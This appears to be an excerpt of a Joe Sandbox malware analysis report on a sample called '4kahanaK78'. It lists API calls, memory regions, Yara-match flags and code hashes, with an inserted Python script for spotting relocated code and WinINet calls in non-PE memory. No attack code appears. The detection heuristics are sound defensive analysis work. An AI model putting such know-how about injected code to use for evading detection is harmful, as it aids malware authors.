                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54
                                    APIs
                                    • _free.LIBCMT ref: 00416FF9
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 0041700B
                                    • _free.LIBCMT ref: 0041701D
                                    • _free.LIBCMT ref: 0041702F
                                    • _free.LIBCMT ref: 00417041
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                    • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                    • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                    • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: *?
                                    • API String ID: 269201875-2564092906
                                    • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                    • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                    • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                    • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                    • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID: api-ms-
                                    • API String ID: 3177248105-2084034818
                                    • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                    • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                    • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                    • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction ID: 77a643673ec7d88cd29a2edf076a5074e238e4b33c83bd47411dea4c6174af87
                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction Fuzzy Hash: 3CB12831A00285DFEB55CF29CC507BEBBF6EF45350F1C456AD6459B241EA39AE02CB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                    • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                    • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                    • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                    APIs
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternet$PointerRead
                                    • String ID:
                                    • API String ID: 3197321146-0
                                    • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                    • Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
                                    • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                    • Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: 2592838cd25b8c71b616a3209bd307f9368e49ef6110a60e681fa7179048d052
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: FD51C0B2A05202EFEB299F56D840BBA77A7EF44314F14412DE80597291E737FA81D790
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                    • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                    • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                    • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
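The three AdjustPointer entries above show the pattern worth pulling out of a report like this: the same Opcode ID (9375933a…) is listed for code at 04CE0000, 04B40000 and 00400000, but each copy carries a different Instruction ID. The report does not document how the two hashes are computed; the reading taken here, that the Opcode ID ignores address-dependent operands and therefore survives relocation while the Instruction ID does not, is an inference from the page. Under that reading, the 04B40000 region (listed as "based on PE: false", with Yara matches, and the only region whose entries call InternetSetFilePointer / InternetReadFile with a 0x3E8-byte buffer) holds a relocated copy of code that also exists in the 00400000 image. The following Python is an added example, not Joe Sandbox code or part of the report: it parses entries in exactly this format, decodes the fifth dot-separated field of the dump file name as the PAGE_* protection (an assumption drawn from the names on this page, not documented semantics), and lists opcode hashes that occur both inside a PE-backed region and in a non-PE executable region, plus WinINet calls made from non-PE code. The sample input is a trimmed excerpt of three entries from this section, not constructed data.

```python
"""Added example (not Joe Sandbox code): correlate IDA-plugin function entries across memory regions."""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple

PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX"}  # winnt.h PAGE_* values

class FuncEntry(NamedTuple):
    base: int              # "Offset:" of the dumped region
    protect: str           # page protection decoded from the dump file name (assumed field)
    from_pe: bool          # "based on PE: true/false"
    yara: bool             # the entry carried a "Yara matches" header
    apis: Tuple[str, ...]  # API references listed under "APIs" (subcalls included)
    opcode_id: str
    instruction_id: str

_SRC = re.compile(r"Source File: (\S+)\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
_API = re.compile(r"^•\s+(?:Part of subcall function [0-9A-Fa-f]+: )?([A-Za-z_][\w.]*)")
_ID = re.compile(r"^• (Opcode|Instruction) ID: ([0-9a-f]+)$")

def split_entries(text: str) -> List[List[str]]:
    """A new entry starts at 'APIs', or at 'Memory Dump Source' when the current chunk
    already has its source line (some entries on the page have no APIs header)."""
    chunks, cur = [], []
    for raw in text.splitlines():
        s = raw.strip()
        if s == "APIs" or (s == "Memory Dump Source" and any(l.startswith("• Source File") for l in cur)):
            if cur:
                chunks.append(cur)
            cur = []
        cur.append(s)
    return chunks + [cur] if cur else chunks

def parse_entry(lines: List[str]) -> Optional[FuncEntry]:
    apis, ids, src, yara, in_apis = [], {}, None, False, False
    for s in lines:
        if s in ("APIs", "Memory Dump Source"):
            in_apis = s == "APIs"
        elif in_apis:
            if (m := _API.match(s)):
                apis.append(m.group(1))
        elif s == "Yara matches":
            yara = True
        elif (m := _SRC.search(s)):
            src = m
        elif (m := _ID.match(s)):
            ids[m.group(1)] = m.group(2)
    if src is None or len(ids) < 2:
        return None
    # Dump names are <a>.<b>.<c>.<base>.<protect>.<state>.<type>.<d>; reading field 4 as the PAGE_*
    # protection fits every region in this report (0x20 code, 0x40 RWX, 0x04/0x02 data) but is an inference.
    prot = int(src.group(1).split(".")[4], 16)
    return FuncEntry(int(src.group(2), 16), PAGE_PROTECT.get(prot, hex(prot)),
                     src.group(3) == "true", yara, tuple(apis), ids["Opcode"], ids["Instruction"])

def parse_report(text: str) -> List[FuncEntry]:
    return [e for e in map(parse_entry, split_entries(text)) if e is not None]

def relocated_copies(entries: List[FuncEntry]) -> Dict[str, dict]:
    """Opcode IDs found both in a PE-backed region and in a non-PE executable region: same
    opcode hash with differing instruction hashes is read here as one function relocated."""
    groups: Dict[str, List[FuncEntry]] = defaultdict(list)
    for e in entries:
        groups[e.opcode_id].append(e)
    return {oid: {"bases": sorted({e.base for e in grp}),
                  "instruction_ids": len({e.instruction_id for e in grp})}
            for oid, grp in groups.items()
            if any(e.from_pe for e in grp) and any(not e.from_pe and "X" in e.protect for e in grp)}

def wininet_outside_pe(entries: List[FuncEntry]) -> List[Tuple[int, str, str]]:
    """(region base, protection, API) for WinINet calls made from code not backed by a PE image."""
    return [(e.base, e.protect, a) for e in entries if not e.from_pe
            for a in e.apis if a.endswith(".WININET")]

# Trimmed excerpt of three entries from the report above (fuzzy-hash lines cut), not constructed data.
SAMPLE = """\
APIs
• InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
• InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B
Memory Dump Source
• Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
Yara matches
• Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
• Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
APIs
Memory Dump Source
• Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
Yara matches
• Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
• Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
APIs
Memory Dump Source
• Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
• Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
• Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
"""
```

Run `relocated_copies(parse_report(text))` over the whole "APIs" section of a report (paste it into `text`) to get, per opcode hash, the region bases it was seen at and how many distinct instruction hashes it has; `wininet_outside_pe` narrows the network-capable functions to those living outside any PE-backed region, which on this page is only the 04B40000 copy.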
                                    APIs
                                      • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                      • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                    • GetLastError.KERNEL32 ref: 10007C36
                                    • __dosmaperr.LIBCMT ref: 10007C3D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                    • __dosmaperr.LIBCMT ref: 10007C83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                    • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                    • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                    • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                    APIs
                                      • Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D
                                      • Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800
                                    • GetLastError.KERNEL32 ref: 04B55D18
                                    • __dosmaperr.LIBCMT ref: 04B55D1F
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
                                    • __dosmaperr.LIBCMT ref: 04B55D65
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                    • Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
                                    • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                    • Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750
                                    APIs
                                      • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                      • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                    • GetLastError.KERNEL32 ref: 00415AB1
                                    • __dosmaperr.LIBCMT ref: 00415AB8
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                    • __dosmaperr.LIBCMT ref: 00415AFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                    • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                    • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                    • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                    • _free.LIBCMT ref: 10006EFE
                                    • _free.LIBCMT ref: 10006F34
                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                    • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                    • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                    • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                    APIs
                                    • GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
                                    • _free.LIBCMT ref: 04B514C6
                                    • _free.LIBCMT ref: 04B514FC
                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                    • Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
                                    • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                    • Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915
                                    APIs
                                    • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,7591DF80,?,004114AD,00000000,7591DF80,00000000,00000000,00401ED8), ref: 00411202
                                    • _free.LIBCMT ref: 0041125F
                                    • _free.LIBCMT ref: 00411295
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,7591DF80,00000000,00000000,00401ED8), ref: 004112A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                    • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                    • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                    • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                    • _free.LIBCMT ref: 10007055
                                    • _free.LIBCMT ref: 1000708B
                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                    • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                    • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                    • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
                                    • _free.LIBCMT ref: 04B5161D
                                    • _free.LIBCMT ref: 04B51653
